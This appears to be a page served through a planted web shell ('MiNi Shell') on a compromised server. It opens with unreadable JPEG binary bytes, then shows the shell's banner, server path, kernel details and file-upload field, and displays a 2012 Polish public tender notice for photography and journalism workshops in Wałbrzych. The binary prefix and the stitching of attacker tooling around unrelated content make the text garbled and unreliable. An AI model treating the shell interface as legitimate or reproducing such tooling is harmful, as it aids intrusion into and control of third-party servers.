JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120216/47740-N-2012.html

<p class="kh_header"><b>Wałbrzych: Zorganizowanie i przeprowadzenie warsztatów rozwijających kompetencje z zakresu wiedzy na temat fotografii i dziennikarstwa dla uczestników Klubu Integracji Społecznej w ramach projektu Centrum Aktywności Lokalnej</b><br>
<b>Numer ogłoszenia: 47740 - 2012; data zamieszczenia: 16.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Beethovena 1-2, 58-300 Wałbrzych, woj. dolnośląskie, tel. 0-74 6640800, faks 0-74 6640800.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.walbrzych.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Pomoc społeczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie warsztatów rozwijających kompetencje z zakresu wiedzy na temat fotografii i dziennikarstwa dla uczestników Klubu Integracji Społecznej w ramach projektu Centrum Aktywności Lokalnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia jest zorganizowanie i przeprowadzenie warsztatów rozwijających kompetencje uczestników w zakresie wiedzy na temat fotografii i dziennikarstwa dla grupy 30 uczestników Klubu Integracji Społecznej w ramach projektu Centrum Aktywności Lokalnej (2 grupy po 15 osób w wieku 15-25 lat). 

Szczegółowe informację odnośnie warunków realizacji przedmiotu zamówienia:

1) W ramach realizacji przedmiotu zamówienia Zamawiający przewiduje łącznie 64 godziny zajęć na 2 grupy warsztatowe:
a) I grupa 15 osób: 
 - zajęcia z dziennikarstwa - łącznie 16 godzin zajęć, z czego 8 godzin zajęć teoretycznych i 8 godzin zajęć praktycznych, 
- zajęcia z warsztatów fotograficznych - łącznie 16 godzin zajęć, z czego 4 godziny zajęć teoretycznych i 12 godzin zajęć praktycznych.
b) II grupa 15 osób:
- zajęcia z dziennikarstwa - łącznie 16 godzin zajęć, z czego 8 godzin zajęć teoretycznych i 8 godzin zajęć praktycznych, 
- zajęcia z warsztatów fotograficznych - łącznie 16 godzin zajęć, z czego 4 godziny zajęć teoretycznych i 12 godzin zajęć praktycznych.

2) Zajęcia będą odbywać w następujących terminach - I grupa 15 osób - zajęcia marzec - kwiecień 2012 r  , II grupa 15 osób - zajęcia październik - listopad 2012 r. Zajęcia prowadzone będą 2 razy w tygodniu po 2 godziny na podstawie harmonogramu zajęć ustalonego przez Zamawiającego w uzgodnieniu z Wykonawcą. 
3) Zajęcia warsztatowe będą odbywać się w pomieszczeniach zapewnionych przez Zamawiającego - budynek Centrum Aktywności Lokalnej przy ul. Mickiewicza 26, 58-300 Wałbrzych. 
4) Wszelkie materiały i sprzęt niezbędny do przeprowadzenia zajęć warsztatowych zapewni Wykonawca. 
5) W ramach przewidzianej przez Zamawiającego łącznej ilości godzin przeznaczonych na realizację zamówienia Wykonawca zobowiązany będzie do opracowania programu prowadzonych warsztatów, uwzględniającego ilość godzin zajęć teoretycznych i praktycznych w ramach danej tematyki warsztatów. 
6) Program warsztatów winien uwzględniać główne założenia Zamawiającego w stosunku do osób biorących udział w warsztatach, tj. zapoznanie ich z tematyką fotografii i dziennikarstwa, rozwijanie twórczego myślenia, wrażliwości i wyobraźni, dostarczanie emocji, wzbogacanie przeżyć, wzrost pewności siebie, umiejętności pracy zespołowej oraz zdolności integracyjne.   
7) Celem warsztatów jest rozwój zainteresowań i podniesienie motywacji do działania dla osób uczestniczących. Podczas warsztatów fotograficzno - dziennikarskich uczestnicy będą mieli okazję poznać od strony teoretycznej i praktycznej ten rodzaj sztuki. Celem dodatkowym warsztatów jest zainteresowanie młodzieży różnymi formami spędzania wolnego czasu, pobudzenie samo rozwoju, poszukiwania własnych talentów i pasji, pomoc w rozwijaniu i pobudzaniu wrażliwości oraz zachęcanie do własnych dziennikarskich i fotograficznych poszukiwań.
8) Podczas zajęć uczestnicy winni nauczyć się podstawowych technik fotografii i zdobyć podstawy warsztatu dziennikarskiego. Jednym z tematów zajęć winna być fotografia portretowa. Uczestnicy wcielą się wówczas zarówno w fotografów jak i modeli, poznając fotografowanie z obu stron - będąc przed i za obiektywem aparatu.
9) W ramach zajęć praktycznych Wykonawca zorganizuje zajęcia plenerowe w Wałbrzychu na terenie rewitalizowanej Dzielnicy Śródmieście, widzianej oczami mieszkańców miasta. W zakresie zajęć plenerowych wchodzić będzie fotografowanie i opisywanie zmian w Śródmieściu. Ze zgromadzonego materiału Wykonawca w ramach usługi wykona album dla każdej z grup (minimum 30 zdjęć formatu 10/15) i 10 zdjęć z obszaru rewitalizowanego, w formacie 20/25 wraz z prezentacją multimedialną.   

W ramach świadczonej usługi Wykonawca zobowiązany będzie do:

1) Zapewnienia materiałów edukacyjnych zgodnych z profilem danego warsztatu. 
2) Realizacji zajęć od poniedziałku do piątku w przedziale czasowym od 8.00 do 16.00 zgodnie z harmonogramem zajęć opracowanym przez Zamawiającego w uzgodnieniu z Wykonawcą.
3) W ramach nadzoru wewnętrznego służącego podnoszeniu jakości prowadzonej usługi wyznaczenia (personalnie) koordynatora sprawującego nadzór nad jego poprawną realizacją.
4) Zapewnienia wykwalifikowanej kadry osób posiadających stosowne uprawnienia i kwalifikacje,  zdolnych do wykonania przedmiotu zamówienia. 
5) Prowadzenia list obecności uczestników na zajęciach oraz dziennika zajęć warsztatowych (odpowiednio oznakowanych), według wzoru opracowanego przez Zamawiającego. Potwierdzenie udziału w warsztatach przez uczestników Wykonawca przekaże Zamawiającemu każdorazowo po zakończeniu danego tygodnia trwania usługi. Listy obecności sporządzane będą każdorazowo w dniu odbywanych warsztatów
6) Wykonania i wydania certyfikatu potwierdzającego ukończenie warsztatów pn. Warsztaty fotograficzno - dziennikarskie - zawierający zestawienie wszystkich działań zawartych w przedmiocie zamówienia (na odwrocie certyfikatu w formie tabelarycznej), z wyszczególnieniem informacji odnośnie ilości godzin teoretycznych i praktycznych, z odpowiednim oznakowaniem promocyjnym uwzględniającym Wytyczne dotyczące oznakowania projektów w ramach Programu Operacyjnego Kapitał Ludzki z lutego 2009 r. oraz Strategię Komunikacji Funduszy Europejskich w ramach Narodowej Strategii Spójności na lata 2007-2013 wraz z załącznikiem Nr 1, a także Wytycznymi w zakresie informacji i promocji, wydany przez Wykonawcę. Wykonawca zobowiązany będzie do przekazania Zamawiającemu na 14 dni przed zakończeniem warsztatów, wzoru w/w certyfikatu (z odpowiednim oznakowaniem unijnym) potwierdzającego ukończenie przez uczestnika projektu warsztatów pn.: Warsztaty fotograficzno - dziennikarskie (w pliku PDF). Powyższy dokument musi być zgodny z wymogami wynikającymi z Wytycznych dotyczących oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki z lutego 2009 r., Strategią Komunikacji Funduszy Europejskich w ramach Narodowej Strategii Spójności na lata 2007 - 2013 wraz z załącznikiem Nr 1 oraz Wytycznych w zakresie informacji i promocji. Po akceptacji przez Zamawiającego w/w wzoru w pliku PDF, Wykonawca bezzwłocznie winien (przed wydaniem ostatecznego dokumentu) przedłożyć jeden wypełniony, papierowy egzemplarz Zamawiającemu, celem jego ostatecznej akceptacji, co będzie warunkować wydanie w/w dokumentu uczestnikom warsztatów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym kryterium żadnych konkretnych wymagań</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym kryterium żadnych konkretnych wymagań</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym kryterium żadnych konkretnych wymagań</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym kryterium żadnych konkretnych wymagań</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym kryterium żadnych konkretnych wymagań</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa może być zmieniona w stosunku do treści złożonej oferty na niżej  	wymienionych warunkach:
 1) w stosunku do terminu realizacji umowy: 
a) terminu wykonania zamówienia w przypadku gdy konieczność ich wprowadzenia wynikła z okoliczności, których nie można było przewidzieć 
w chwili zawarcia umowy.
b) sposobu i zakresu realizacji zamówienia w przypadku gdy konieczność ich wprowadzenia wynikła z okoliczności, których nie można było przewidzieć 
w chwili zawarcia umowy.
       2) w stosunku do osób:
   		a) zmiany osób reprezentujących w przypadku zmian organizacyjnych,
b) w każdym przypadku, gdy zmiana jest korzystna dla Zamawiającego (np. gdy obniży to koszty usługi),
Wszelkie zmiany do umowy wymagają zgody Zamawiającego oraz będą wprowadzane do umowy w formie pisemnego aneksu pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.walbrzych.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Wałbrzychu, ul. Beethovena 1-2,58-300 Wałbrzych - pok. 105.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.02.2012 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Wałbrzychu - pok. 105.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - Priorytet I - Zatrudnienie i  integracja społeczna,  Działanie 1.2 Wsparcie systemowe instytucji pomocy i integracji społecznej, Poddziałanie 1.17 Rewitalizacja społeczna..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com